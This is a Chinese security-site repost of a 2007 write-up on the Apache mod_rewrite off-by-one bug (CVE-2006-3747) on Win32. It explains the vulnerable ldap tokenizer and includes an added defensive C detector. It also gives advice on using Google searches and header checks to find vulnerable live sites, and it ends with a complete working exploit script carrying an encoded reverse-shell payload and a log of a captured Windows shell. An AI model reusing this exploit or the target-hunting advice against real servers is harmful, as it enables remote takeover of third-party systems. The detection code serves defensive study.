Vuln Review: Apache Mod_Rewrite Off-by-one Remote Exploit (Win32) - Vulnerability Alert - 黑吧安全网 (myhack58)

2007-04-11T00:00:00
ID MYHACK58:62200714977
Type myhack58
Reporter Anonymous (佚名)
Modified 2007-04-11T00:00:00

Description

by axis Date: 2007-04-07 http://www.ph4nt0m.org

Last time on IRC I demoed a different vulnerability to get a cmd banner, and swan (a well-known hacker) mistook it for this one, so I recently used some spare time to play with this vulnerability. On Windows it seems quite generic: execution goes straight into my shellcode, though the shellcode itself is somewhat constrained.

Exploitation does, however, impose some conditions on the server:

  • The RewriteRule allows the attacker to control the initial part of the rewritten URL (for example, the substitution URL starts with $1).
  • The RewriteRule flags do NOT include any of the following: Forbidden (F), Gone (G), or NoEscape (NE).

Specific reference

<http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html>

The vulnerability also depends on the compiler, because it is an off-by-one: some compilers, gcc among them, habitually pad the frame after ebp with a few bytes for alignment, so the one extra write lands in padding. The default Red Hat build is therefore not affected.

On Windows, however, it is exploitable, and from what I have seen it is quite reliable.

There are a few ways to check whether a server is vulnerable. Submit the payload: if the web server answers 302, the vulnerability is not present (the absolute ldap:// substitution was simply turned into an external redirect). If it answers 400, the rewrite rule most likely does not meet the conditions above, so the bug cannot be triggered.

The shellcode has some bad characters that must be filtered out, for example ? and / and other special characters. I simply took a shellcode from BackTrack (BT), alpha2-encoded, which saves trouble; anyone can generate one with metasploit.

The filler characters in front of the payload, such as Ph4nt0m, appear to have nothing to do with the vulnerability itself, and their number is arbitrary; I did not look into this carefully.

The problem code is (line numbers from the mod_rewrite.c being discussed):

```c
2696     /* escape absolute uri, which may or may not be path oriented.
2697      * So let's handle them differently.
2698      */
2699     static char *escape_absolute_uri(ap_pool *p, char *uri, unsigned scheme)
2700     {
2701         char *cp;
2702         ...
2727         /* special thing for ldap.
2728          * The parts are separated by question marks. From RFC 2255:
2729          *     ldapurl = scheme "://" [hostport] ["/"
2730          *               [dn ["?" [attributes] ["?" [scope]
2731          *               ["?" [filter] ["?" extensions]]]]]]
2732          */
2733         if (!strncasecmp(uri, "ldap", 4)) {
2734             char *token[5];
2735             int c = 0;
2736
2737             token[0] = cp = ap_pstrdup(p, cp);
2738             while (*cp && c < 5) {
2739                 if (*cp == '?') {
2740                     token[++c] = cp + 1;
2741                     *cp = '\0';
2742                 }
2743                 ++cp;
2744             }
```

If an LDAP URI contains a fifth '?', line 2740 executes token[++c] with c becoming 5 and writes token[5], one element past the end of the five-element array: the off-by-one.

Specific reference <http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded>
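As an added example (mine, not code from axis's post or from the Apache sources), here is a bounded version of the '?'-tokenizer above next to a detector for request paths and access-log lines that carry the trigger shape: an ldap: URL with five or more percent-encoded '?', which is exactly what the %3f sequence in the exploit later on this page sends. The function names and the sample log lines are constructed; the bound on the loop is my own hardening, equivalent in effect to stopping after four separators.

```c
/* Added example (mine, not code from axis's post or from Apache): a bounded
 * version of the ldap '?'-tokenizer shown above, plus a detector for request
 * paths and access-log lines with the trigger shape. Names and log lines here
 * are constructed for this example. */
#include <stdio.h>
#include <string.h>
#include <strings.h>            /* strncasecmp (POSIX) */

#define LDAP_TOKENS 5           /* same size as the original char *token[5] */

/* Hardened split: the original looped while `c < 5`, so the fifth '?' ran
 * token[++c] with c == 5, one pointer past the array. Bounding on
 * LDAP_TOKENS - 1 keeps ++c <= 4; later '?' stay inside the last token.
 * Consumed separators are NUL'd in place; returns the tokens recorded. */
static int split_ldap_uri(char *uri, char *token[LDAP_TOKENS])
{
    char *cp = uri;
    int c = 0;

    token[0] = cp;
    while (*cp && c < LDAP_TOKENS - 1) {
        if (*cp == '?') {
            token[++c] = cp + 1;
            *cp = '\0';
        }
        ++cp;
    }
    return c + 1;
}

/* Split a private copy of `uri`; 1 when token count and last token match. */
static int split_matches(const char *uri, int want_count, const char *want_last)
{
    char copy[256], *tok[LDAP_TOKENS];
    int count;

    if (strlen(uri) >= sizeof copy)
        return 0;
    strcpy(copy, uri);
    count = split_ldap_uri(copy, tok);
    return count == want_count && strcmp(tok[count - 1], want_last) == 0;
}

/* Count the '?' separators that reach mod_rewrite's view of the path. A
 * literal '?' in the request line starts the query string and never enters
 * r->uri; only %3f / %3F counts, since that is decoded back to '?' before the
 * RewriteRule runs. -1 when the path has no ldap: URL at all (the exploit
 * puts it after the rewritten prefix: "/1/ldap://..."). */
static int ldap_qmark_count(const char *path)
{
    const char *s = path;
    int n = 0;

    while (*s && strncasecmp(s, "ldap:", 5) != 0)
        ++s;
    if (*s == '\0')
        return -1;
    for (; *s; ++s)
        if (s[0] == '%' && s[1] == '3' && (s[2] == 'f' || s[2] == 'F'))
            ++n;
    return n;
}

/* Copy the request path out of a common/combined log line ("GET /p HTTP/1.0"). */
static int log_request_path(const char *line, char *out, size_t outsz)
{
    const char *q = strchr(line, '"'), *sp, *end;
    size_t len;

    if (!q || !(sp = strchr(q + 1, ' ')) || !(end = strpbrk(sp + 1, " \"")))
        return 0;
    len = (size_t)(end - sp - 1);
    if (len >= outsz)
        return 0;
    memcpy(out, sp + 1, len);
    out[len] = '\0';
    return 1;
}

/* Constructed sample lines: a plain request, the five-%3f trigger, three %3f. */
static const char *const SAMPLE_LOG[] = {
    "10.0.0.5 - - [07/Apr/2007:10:01:02 +0800] \"GET /1/index.htm?id=3 HTTP/1.0\" 200 512",
    "10.0.0.9 - - [07/Apr/2007:10:01:07 +0800] \"GET /1/ldap://ph4nt0m/AAAA%3fA%3fA%3fCCCC%3fC%3f%90ZZ HTTP/1.0\" 302 0",
    "10.0.0.9 - - [07/Apr/2007:10:01:09 +0800] \"GET /1/ldap://host/dn%3fattr%3fscope%3ffilter HTTP/1.0\" 302 0",
};

/* Number of the n log lines whose path would drive the original loop to token[5]. */
static int scan_access_log(const char *const lines[], size_t n)
{
    char path[2048];
    int hits = 0;
    size_t i;

    for (i = 0; i < n; ++i)
        if (log_request_path(lines[i], path, sizeof path) &&
            ldap_qmark_count(path) >= LDAP_TOKENS)
            ++hits;
    return hits;
}

int main(void)
{
    printf("split keeps the fifth '?' inside token[4]: %d\n",
           split_matches("ldap://host/dn?attr?scope?filter?ext?overflow", 5, "ext?overflow"));
    printf("trigger lines in sample log: %d of 3\n", scan_access_log(SAMPLE_LOG, 3));
    return 0;
}
```

The split shows what the bound buys you: with five separators in the input, the last '?' stays inside token[4] instead of producing a sixth pointer. The log scanner is the detection side of the same condition; a 302 next to such a request (as in the constructed second line) is what a patched server produces, while a vulnerable Win32 build would have run whatever followed the fifth %3f.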

You can use Google hacking to find vulnerable sites. Sites that use mod_rewrite are generally large ones, for example those that disguise PHP as .htm or .html, which certainly means mod_rewrite; so you can search directly with the Google keyword allinurl:".htm?id=", since a dynamically invoked .htm page is certainly disguised, and look for similar patterns. Then write an automated script to determine which of these sites run Apache (Win32), which the Server field of the HTTP response header shows.

Or is there a better method?

Finally, here is my exploit script; modify httpd.conf according to the notes in it.

```sh
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
# by axis <axis@ph4nt0m>
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
#           Windows2003 CN SP1
#
# Vulnerable Apache Versions:
#   * 1.3 branch: >1.3.28 and < 1.3.37
#   * 2.0 branch: >2.0.46 and < 2.0.59
#   * 2.2 branch: >2.2.0 & <2.2.3
#
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# first POC by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
# http://www.milw0rm.com/exploits/2237
#
# to successfully exploit the vuln, there are some conditions:
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
# some compilers add padding to the stack, so they cannot be exploited,
# like gcc under redhat
#
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
#
# no opcodes needed under windows! it will directly run our shellcode
#
# my apache config file [httpd.conf]:
#   RewriteEngine on
#   RewriteRule 1/(.*) $1
#   RewriteLog "logs/rewrite.log"
#   RewriteLogLevel 3
#
# Usage:
#   [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
#   mod_rewrite apache off-by-one overflow
#
#   [axis@opensystemX axis]$ nc -vv -n -l -p 1154
#   listening on [any] 1154 ...
#   connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
#   Microsoft Windows [版本 5.2.3790]
#   (C) 版权所有 1985-2003 Microsoft Corp.
#
#   D:\Apache\Apache2>exit
#   exit
#   sent 5, rcvd 100
#
# shellcode badchars I used here; actually not this many are needed.
# The two real badchars are 0x3f and 0x0b; the rest are ones I habitually
# keep when generating shellcode:
#   0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b

echo -e "mod_rewrite apache off-by-one overflow"

if [ $# -ne 1 ] ; then
    echo "Usage: $0 webserver"
    exit
fi

host=$1

# use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
# %3f ('?') is what triggers the vuln
# string "CCCC.." is any arbitrary string, again followed by %3f to trigger the vuln
# %90 is the machine code we will jmp to (NOP), run shellcode from here
# shellcode: reverse shell to 192.168.0.1, port 1154, alpha2 encoded
echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\
%3fA%3fA%3f\
`perl -e 'print "C"x10'`%3fC%3f%90\
`perl -e 'print "\
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63\
\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x42\x41\x41\x32\
\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x79\x6c\x51\
\x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x6f\x6b\x4f\x65\
\x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x55\x77\x4c\x6c\
\x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x4b\x72\x6f\x36\
\x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x79\x4e\x6b\x44\
\x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x59\x6c\x6c\x4b\
\x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x76\x6d\x76\x61\x6f\
\x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x38\x30\x75\x4b\
\x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x46\x6e\x6b\x34\
\x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x6b\x43\x33\x74\
\x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x41\x6f\x33\x50\
\x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x4b\x33\x70\x64\
\x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x70\x47\x78\x33\
\x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x50\x59\x6f\x79\
\x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x72\x42\x48\x53\
\x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x50\x52\x48\x5a\
\x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x56\x61\x4f\x4e\
\x69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x32\x42\x75\x52\
\x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\x69\x55\x59\x6c\x35\x6e\
\x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x33\x76\x33\x43\
\x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x68\x6f\x30\x6d\
\x78\x35\x50\x46\x61\x30\x66\x30\x68\x76\x64\x6c\x42\x33\x56\x70\
\x53\x4e\x69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x79\x4c\x6a\x73\
\x50\x53\x67\x6b\x4f\x6a\x76\x73\x5a\x72\x30\x73\x61\x53\x65\x4b\
\x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x68\x51\x73\x50\
\x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x49\x4b\x57\x42\
\x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x73\x4f\x5a\x6f\
\x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x4e\x33\x72\x34\
\x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x6b\x71\x78\x32\
\x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x78\x6b\x4f\x6e\
\x36\x71\x4b\x42\x77\x43\x62\x53\x61\x76\x31\x70\x51\x30\x6a\x35\
\x51\x62\x71\x76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x30\x73\x58\x4e\
\x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x76\x30\x6a\x39\
\x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x77\x54\x39\x79\
\x56\x71\x69\x79\x6f\x53\x45\x56\x64\x69\x6f\x69\x46\x6b\x4f\x62\
\x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x7a\x37\x74\x43\
\x6f\x72\x73\x4b\x4f\x6a\x76\x79\x6f\x38\x50\x63\
"'`\
 HTTP/1.0\r\n\
Host: $host\r\n\r\n" | nc -vv $host 80
```